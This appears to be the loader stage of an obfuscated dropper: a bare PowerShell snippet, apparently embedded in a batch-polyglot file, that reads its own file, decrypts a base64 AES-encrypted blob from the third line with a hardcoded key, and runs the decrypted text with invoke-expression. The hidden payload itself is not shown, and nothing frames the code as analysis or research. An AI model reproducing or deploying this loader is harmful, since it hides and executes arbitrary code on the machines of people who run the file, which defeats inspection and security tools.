$path="%~dpnx0";
$key = "94cc69c50c1127d3b92b02d337ee0a12";
$aesManaged = New-Object "System.Security.Cryptography.AesManaged";
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; 
$aesManaged.BlockSize = 128;
$aesManaged.KeySize = 128;
$aesManaged.Key = [System.Text.Encoding]::UTF8.GetBytes($key); 
$file = get-content -raw $path;
$line = $file.split("`n")[2].split(" ")[1].trim();
$bytes = [System.Convert]::FromBase64String($line);
$aesManaged.IV = $bytes[0..15];
$unencryptedData = [System.Text.Encoding]::UTF8.GetString($aesManaged.CreateDecryptor().TransformFinalBlock($bytes, 16, $bytes.Length - 16)).Trim([char]0);
$aesManaged.Dispose();
invoke-expression $unencryptedData;
